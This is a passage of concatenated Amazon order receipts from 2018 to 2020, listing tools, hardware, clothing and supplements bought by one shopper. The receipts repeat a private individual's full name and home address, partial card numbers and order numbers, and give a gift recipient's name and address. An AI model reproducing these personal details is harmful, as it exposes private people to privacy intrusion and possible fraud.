MONROE ST NW WASHINGTON, DC 20010 Grand Total:$3.88 United States Credit Card transactions Visa ending in 4452: January 13, 2018:$3.88 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2035453-6548216 Order Placed: January 10, 2018 Amazon.com order number: 111-2035453-6548216 Order Total: $41.61 Shipped on January 11, 2018 Items Ordered Price 1 of: SharkBite 25088 Toilet Installation and Plumbing Kit Including Toilet Supply Line, $16.97 Toilet Connector, and Toilet Angle Shut Off Valve Sold by: Amazon.com Services LLC Condition: New 1 of: Sheffield Tools 60018 Retrieval Tool Set, 3-Piece $14.38 Sold by: Amazon.com Services LLC Condition: New 1 of: PORTER-CABLE PC760R 9-Inch Pruning Reciprocating Saw Blades, 3-Pack $7.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $39.34 Visa | Last digits: 4452 Shipping & Handling: $11.97 Free Shipping:-$11.97 Billing address BRIAN J COADY Total before tax: $39.34 1454 MONROE ST NW Estimated tax to be collected: $2.27 WASHINGTON, DC 20010 United States Grand Total:$41.61 Credit Card transactions Visa ending in 4452: January 11, 2018:$41.61 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-0380084-9101025 Order Placed: January 10, 2018 Amazon.com order number: 111-0380084-9101025 Order Total: $178.93 Shipped on January 11, 2018 Items Ordered Price 1 of: 48" Root Assassin Shovel /Saw -THE ORIGINAL & BEST Award Winning Shovel & $49.99 Saw Combo Garden Tool Sold by: Great States (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 16, 2018 Items Ordered Price 1 of: Anianiau Professional Upholstery Tools Staple Remover,ergonomic handle -$10.89 Saves You Hours -2 PCS (Yellow) Sold by: Anianiau (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 12, 2018 Items Ordered 1 of: Unique Banana Holder by Banana Bungee|Easy to Use Banana Hanger, Leading Banana Hook Alternative, Most Effective Fruit Storage Since the Banana Tree, 4 Cord Lock Design, Hang Anywhere Sold by: The Banana Bungee LLC (seller profile) Price $9.94 Condition: New 1 of: Cargo Net with 28 Durable Nylon Hooks -Large 72" x 96" -Stretches to 100" x 140" by Grizzly Gear Sold by: River Colony Trading (seller profile) $15.75 Condition: New Brand New, Sealed, Fast Shipping, Satisfaction guaranteed! 1 of: Authentic Japanese Woodworking Flush Cut Trim Saw Flexible Blade Sold by: Bear Bear Woodworking (seller profile) $17.99 Condition: New 1 of: Arrow Fastener HT50P Heavy Duty Hammer Tacker Sold by: Amazon.com Services LLC $24.00 Condition: New 1 of: Roadpro 12-Volt Polar Fleece Heated Travel Blanket, ( 58 x 42.5 Inch ) Sold by: Amazon.com Services LLC $29.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 11, 2018 Items Ordered 1 of: POWERTEC 70133 2-1/2-Inch Blast Gate for Vacuum/Dust Collector Sold by: Amazon.com Services LLC Price $4.88 Condition: New 2 of: M-D Building Products 5090 Triple Fin Door Sweep DV-1, 36-Inch, Silver, M-D BUILDING PRODUCTS Sold by: Amazon.com Services LLC $5.85 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $175.09 Visa | Last digits: 4452 Shipping & Handling: $0.00 Promotion applied: -$0.22 Billing address BRIAN J COADY Total before tax: $174.871454 MONROE ST NW Estimated tax to be collected: $4.06WASHINGTON, DC 20010 United States Grand Total:$178.93 Credit Card transactions Visa ending in 4452: January 16, 2018: $10.67 Visa ending in 4452: January 12, 2018:$168.26 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0368259-1699417 Order Placed: January 10, 2018 Amazon.com order number: 111-0368259-1699417 Order Total: $8.99 Shipped on January 11, 2018 Items Ordered Price 1 of: Fastap B150TT #6 x 1-1/2" Trimtite Self Drilling Wood Finishing Screws with Yellow Zinc Finish -Square Drive Head 100 per Package Sold by: Quality Distributing LLC (seller profile) $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $8.99 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $8.99BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$8.99 United States Credit Card transactions Visa ending in 4452: January 11, 2018:$8.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1301654-5601820 Subscribe and Save Order Placed: December 26, 2019 Amazon.com order number: 111-1301654-5601820 Order Total: $14.82 This order contains Subscribe & Save items. Shipped on January 7, 2020 Items Ordered Price 1 of: Solaray® Cal-Mag Citrate 1:1 | Calcium & Magnesium Citrate | For Healthy Bones, Teeth, Muscle & Nervous System Function | High Absorption | 180 Count Sold by: Healthway Shop (seller profile) $17.43 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.43 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.61 Billing address Total before tax: $14.82Brian J Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.82 United States Credit Card transactions MasterCard ending in 3104: January 7, 2020:$14.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4854508-5374664 Subscribe and Save Order Placed: December 25, 2019 Amazon.com order number: 111-4854508-5374664 Order Total: $12.52 This order contains Subscribe & Save items. Shipped on January 2, 2020 Items Ordered Price 1 of: Raid Multi Insect Killer, Orange Breeze, 15 OZ (Pack -1) Sold by: Amazon.com Services LLC $13.90 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.90 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.09 Billing address Total before tax: $11.81Brian J Coady Estimated tax to be collected: $0.711454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.52 United States Credit Card transactions MasterCard ending in 3104: January 2, 2020:$12.52 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6640601-7708239 Subscribe and Save Order Placed: December 25, 2019 Amazon.com order number: 113-6640601-7708239 Order Total: $15.38 This order contains Subscribe & Save items. Shipped on January 6, 2020 Items Ordered Price 1 of: Hoosier Hill Farm Vital Wheat Gluten, 4 Pound Sold by: Amazon.com Services LLC $18.09 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $18.09 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.71 Billing address Total before tax: $15.38Brian J Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.38 United States Credit Card transactions MasterCard ending in 3104: January 6, 2020:$15.38 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-6632441-6383441 Subscribe and Save Order Placed: December 24, 2019 Amazon.com order number: 112-6632441-6383441 Order Total: $11.04 This order contains Subscribe & Save items. Shipped on January 6, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Coenzyme Q10 100 mg -Normal Energy Production, Supports Cardiovascular Health -3 Month Supply (90 Softgels) Sold by: Amazon.com Services LLC $12.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $12.99 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.95 Billing address Total before tax: $11.04Brian J Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$11.04 United States Credit Card transactions MasterCard ending in 3104: January 6, 2020:$11.04 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2940850-3161837 Subscribe and Save Order Placed: December 24, 2019 Amazon.com order number: 114-2940850-3161837 Order Total: $10.17 This order contains Subscribe & Save items. Shipped on January 6, 2020 Items Ordered Price 1 of: HighKey Monk Fruit, Stevia, Erythritol Sweetener 2:1 Blend -Keto, Diabetic & Paleo Friendly -Granulated, Low Calorie, No Carb Natural Sugar Substitu Sold by: HighKey Snacks (seller profile) $11.97 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $11.97 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Subscribe & Save: -$1.80 Billing address Brian J Coady Total before tax: $10.171454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010-3139 United States Grand Total:$10.17 Credit Card transactions MasterCard ending in 3104: January 6, 2020:$10.17 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3291827-3951448 Order Placed: December 15, 2019 Amazon.com order number: 111-3291827-3951448 Order Total: $41.34 Shipped on December 17, 2019 Items Ordered Price 1 of: Alaska Bear® Natural Silk Thermal Glove Liners Ski Bike Motorcycle Cycling Golf Liner Gloves Sold by: Alaska Bear (seller profile) | Product question? Ask Seller $15.99 Condition: New 1 of: 100% Pure Silk Thermal Liner Gloves Inner for Bikers, Skiers, Dog Walkers, Cyclists, Fishermen, Gardeners and all Outdoor Activities. Sold by: Click2Solutions (seller profile) $9.96 Condition: New 1 of: Terramar Thermasilk Mid Calf Sock, Black, Small Sold by: Amazon.com Services LLC $12.65 Condition: New 1 of: Terramar Thermasilk Sock Liner Headwear, Natural, Small/7-9 Sold by: Amazon.com Services LLC $12.99 Condition: New Shipping Address: Kathy Pieper 221 W CHOCOLAY ST MUNISING, MI 49862-1201 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $51.59 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Gift Card Total before tax: $51.59 Billing address Estimated tax to be collected: $1.54 Brian J Coady Gift Card Amount:-$11.79 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$41.34 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3959681-4240235 Order Placed: December 14, 2019 Amazon.com order number: 111-3959681-4240235 Order Total: $0.00 Shipped on December 15, 2019 Items Ordered Price 1 of: Carhartt Men's Full Cushion Recycled Wool Crew Socks, Brown, Shoe: 6-12 Sold by: Amazon.com Services LLC $9.99 Condition: New 1 of: DANISH ENDURANCE Merino Wool Hiking & Trekking Socks (Forest Green 1 Pair, US Women 8-10 // US Men 6.5-8.5) Sold by: DANISH ENDURANCE (seller profile) $12.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $22.98 Visa | Last digits: 1241 Shipping & Handling: $5.99 Gift Card Total before tax: $28.97Billing address Estimated tax to be collected: $1.74Brian Coady Gift Card Amount:-$30.71 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3546491-9532252 Order Placed: December 14, 2019 Amazon.com order number: 111-3546491-9532252 Order Total: $0.00 Shipped on December 15, 2019 Items Ordered Price 1 of: Mens Wool Socks Warm Thermal Thick Heavy Cold Weather Winter Socks 5 Pack $13.99 (Solid Color O) Sold by: Sandsuced (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $13.99 Visa | Last digits: 1241 Shipping & Handling: $0.00 Gift Card Total before tax: $13.99Billing address Estimated tax to be collected: $0.84Brian Coady Gift Card Amount:-$14.83 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1032357-7704230 Order Placed: December 13, 2019 Amazon.com order number: 111-1032357-7704230 Order Total: $0.00 Shipped on December 14, 2019 Items Ordered Price 1 of: ROCO MINIMALIST Aluminum Slim Wallet RFID BLOCKING Money Clip -No.2 (Camo) Sold by: Sprintex (seller profile) $14.95 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.95 Visa | Last digits: 1241 Shipping & Handling: $0.00 Gift Card Total before tax: $14.95Billing address Estimated tax to be collected: $0.90Brian Coady Gift Card Amount:-$15.85 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3273392-2506609 Order Placed: December 13, 2019 Amazon.com order number: 111-3273392-2506609 Order Total: $0.00 Shipped on December 14, 2019 Items Ordered Price 1 of: Carbon Fiber Wallet -Rfid Wallets For Men -Money Clip -Metal Wallet -Slim Money Clip -Fiber Wallets -Carbon Fiber Money Clip -Rfid Minimalist W Sold by: Sorant (seller profile) $10.95 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $10.95 Visa | Last digits: 1241 Shipping & Handling: $0.00 Gift Card Total before tax: $10.95Billing address Estimated tax to be collected: $0.66Brian Coady Gift Card Amount:-$11.61 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-7384530-1565014 Order Placed: December 11, 2019 Amazon.com order number: 113-7384530-1565014 Order Total: $0.00 Shipped on December 12, 2019 Items Ordered Price 1 of: Optimal Shop 2 In 1 HDMI Cable Tester and Network Cable Tester,RJ45 Cat5 Cat6 $0.00 HDMI Wire Tester Sold by: Optimal Shop (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $0.00 Gift Card Shipping & Handling: $0.00 Billing address Total before tax: $0.00Brian Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6134804-6274616 Order Placed: December 11, 2019 Amazon.com order number: 111-6134804-6274616 Order Total: $44.92 Shipped on December 11, 2019 Items Ordered Price 2 of: [Upgraded] Large Gap Door Draft Stopper, 3-2/5"W Widened Door Sweep for $12.99 Interior and Exterior Doors -Guard Against Drafts, Dust, Noise and Unwanted Animals (3-2/5"W x 39"L, Black) Sold by: Small homeware (seller profile) Condition: New 1 of: Dimensions Needlecrafts Natural Earth Tone Wool Roving for Needle Felting, 8 pack, 80g Sold by: Amazon.com Services LLC $9.42 Condition: New 1 of: Zerust Rust Prevention Plastabs 1" x 3" -Pack of 10 Sold by: Kaspien (seller profile) $6.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $42.37 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $42.37 Brian Coady Estimated tax to be collected: $2.55 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$44.92 United States Credit Card transactions AmazonPLCC ending in 3157: December 11, 2019:$44.92 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-3819580-0494664 Order Placed: December 10, 2019 Amazon.com order number: 111-3819580-0494664 Order Total: $8.44 Shipped on December 10, 2019 Items Ordered Price 1 of: Omnihil (White) 5 Feet AC Power Cord Compatible with Apple Airport Extreme/Time Capsule -2TB / 3TB Express Power Supply Charger Cord Sold by: OMNIHIL (seller profile) | Product question? Ask Seller $7.96 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $7.96 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $7.96Brian Coady Estimated tax to be collected: $0.48 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.44 United States Credit Card transactions Visa ending in 1241: December 10, 2019:$8.44 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4003515-1963438 Order Placed: December 10, 2019 Amazon.com order number: 111-4003515-1963438 Order Total: $9.11 Shipped on December 10, 2019 Items Ordered Price 1 of: CableCreation 10 Feet 18 AWG Angled 2-Slot Non-Polarized Angle Power Cord (IEC320 C7 to Nema 1-15P), 3M / Black Sold by: CableCreation (seller profile) | Product question? Ask Seller $8.59 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $8.59 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $8.59Brian Coady Estimated tax to be collected: $0.52 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$9.11 United States Credit Card transactions Visa ending in 1241: December 10, 2019:$9.11 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0969025-0037036 Order Placed: December 9, 2019 Amazon.com order number: 111-0969025-0037036 Order Total: $19.19 Shipped on December 10, 2019 Items Ordered Price 1 of: Sovereign Silver for Pets Bio-Active Silver Hydrosol for Immune Support* -4oz Dropper -The Ultimate Refinement of Colloidal Silver -Safe*, Pure and Sold by: ZQUARED (seller profile) $19.19 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $19.19 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $19.19Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$19.19 United States Credit Card transactions Visa ending in 1241: December 10, 2019:$19.19 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9123138-6183429 Order Placed: December 9, 2019 Amazon.com order number: 111-9123138-6183429 Order Total: $14.84 Shipped on December 10, 2019 Items Ordered Price 1 of: Original Manufacturer Filter Bags for Porter-Cable and Stanley 4 Gallon Wet/Dry $14.00 Vacuum -3 Pack Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.00 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $14.00Brian Coady Estimated tax to be collected: $0.841454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.84 United States Credit Card transactions Visa ending in 1241: December 10, 2019:$14.84 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9488225-0256256 Order Placed: December 9, 2019 Amazon.com order number: 111-9488225-0256256 Order Total: $14.41 Shipped on December 10, 2019 Items Ordered Price 1 of: Etekcity Lasergrip 774 Non-contact Digital Laser Infrared Thermometer Temperature Gun -58℉~ 716℉ (-50℃ ~ 380℃), Yellow and Sold by: Amazon.com Services LLC $13.59 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $13.59 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $13.59Brian Coady Estimated tax to be collected: $0.821454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.41 United States Credit Card transactions Visa ending in 1241: December 10, 2019:$14.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0255988-5932279 Order Placed: December 9, 2019 Amazon.com order number: 111-0255988-5932279 Order Total: $8.28 Shipped on December 10, 2019 Items Ordered Price 1 of: General Tools 70408 Bent Tip Lighted Tweezers Sold by: Amazon.com Services LLC $7.81 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $7.81 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $7.81 Brian Coady Estimated tax to be collected: $0.47 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.28 United States Credit Card transactions Visa ending in 1241: December 10, 2019:$8.28 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0147002-7993841 Order Placed: December 7, 2019 Amazon.com order number: 111-0147002-7993841 Order Total: $9.99 Shipped on December 8, 2019 Items Ordered Price 1 of: Frogg Toggs Men's Waterproof Breathable Bucket Hat, Royal Blue, Adjustable Sold by: SeasonWide (seller profile) $9.42 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $9.42 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $9.42 Brian Coady Estimated tax to be collected: $0.57 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$9.99 United States Credit Card transactions Visa ending in 1241: December 8, 2019:$9.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7117196-1481819 Order Placed: December 7, 2019 Amazon.com order number: 111-7117196-1481819 Order Total: $12.71 Shipped on December 8, 2019 Items Ordered Price 1 of: Gorilla Heavy Duty Double Sided Mounting Tape, 1 Inch x 60 Inches, Black(Pack $11.99 of 2) Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $11.99 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $11.99Brian Coady Estimated tax to be collected: $0.721454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.71 United States Credit Card transactions Visa ending in 1241: December 8, 2019:$12.71 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0922266-1069812 Order Placed: December 7, 2019 Amazon.com order number: 111-0922266-1069812 Order Total: $6.35 Shipped on December 8, 2019 Items Ordered Price 1 of: Loctite 209741 ADHESIVES_AND_SEALANTS, 1 pack, Red Sold by: Amazon.com Services LLC $5.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $5.99 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $5.99 Brian Coady Estimated tax to be collected: $0.36 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$6.35 United States Credit Card transactions Visa ending in 1241: December 8, 2019:$6.35 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7656808-9323434 Order Placed: December 7, 2019 Amazon.com order number: 111-7656808-9323434 Order Total: $5.75 Shipped on December 8, 2019 Items Ordered Price 1 of: Loctite Heavy Duty Threadlocker, 0.2 oz, Blue 242, Single Sold by: Amazon.com Services LLC $5.42 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $5.42 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $5.42 Brian Coady Estimated tax to be collected: $0.33 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$5.75 United States Credit Card transactions Visa ending in 1241: December 8, 2019:$5.75 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7122475-7013855 Order Placed: December 6, 2019 Amazon.com order number: 111-7122475-7013855 Order Total: $10.18 Shipped on December 7, 2019 Items Ordered Price 1 of: Hillman Available 48594 Power Pro Premium Exterior Wood Screw, 8 X 1 1/4-Inch, $9.60 1 Pound, 8" x 1-1/4", 10 Piece Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $9.60 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $9.60Brian Coady Estimated tax to be collected: $0.581454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.18 United States Credit Card transactions Visa ending in 1241: December 7, 2019:$10.18 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0659700-4537842 Order Placed: December 5, 2019 Amazon.com order number: 111-0659700-4537842 Order Total: $67.03 Shipped on December 6, 2019 Items Ordered Price 1 of: Big Gator Tools MDG1000NP V-Drill Guide Sold by: NG, Inc. (seller profile) $24.95 Condition: New 1 of: Bosch SP515 5 Pc. Hex Shank Countersink Drill Bit Set Sold by: Amazon.com Services LLC $14.48 Condition: New 1 of: Majestic Pure Clove Essential Oil-Pure and Natural, Therapeutic Grade Clove Oil -4 Ounces Sold by: Majestic Pure (seller profile) $15.98 Condition: New 1 of: Cinnamon Bark (Large 4 Ounce) Best Essential Oil Sold by: Prime Time Commerce (seller profile) | Product question? Ask Seller $9.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $65.40 Visa | Last digits: 1241 Shipping & Handling: $0.00 Your Coupon Savings: -$1.60 Billing address Brian Coady Total before tax: $63.80 1454 MONROE ST NW Estimated tax to be collected: $3.23 WASHINGTON, DC 20010-3139 United States Grand Total:$67.03 Credit Card transactions Visa ending in 1241: December 6, 2019:$67.03 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-5545134-4625816 Order Placed: December 2, 2019 Amazon.com order number: 111-5545134-4625816 Order Total: $30.73 Shipped on December 3, 2019 Items Ordered Price 1 of: Incra PROTRAC06 6-Inch Precision Marking Protractor Sold by: Yellowhammer Tool Works (seller profile) $28.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $28.99 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $28.99 Brian Coady Estimated tax to be collected: $1.741454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$30.73 United States Credit Card transactions Visa ending in 1241: December 3, 2019:$30.73 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5471213-3727440 Order Placed: December 2, 2019 Amazon.com order number: 111-5471213-3727440 Order Total: $33.23 Shipped on December 11, 2019 Items Ordered 1 of: Morakniv Craftline Carpentry Chisel with Carbon Steel Blade, 3.0-Inch Sold by: Amazon.com Services LLC Price $17.37 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Shipped on December 4, 2019 Items Ordered 1 of: Newkiton 4 Way Wood Rasp File Carbon Hand File and Round Rasp Half Round Flat & Needle Files Sold by: Gooray (seller profile) Price $9.99 Condition: New 1 of: Malco A0 USA Made Regular Grip Scratch Awl, 1/8" Sold by: Amazon.com Services LLC $3.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Print this page for 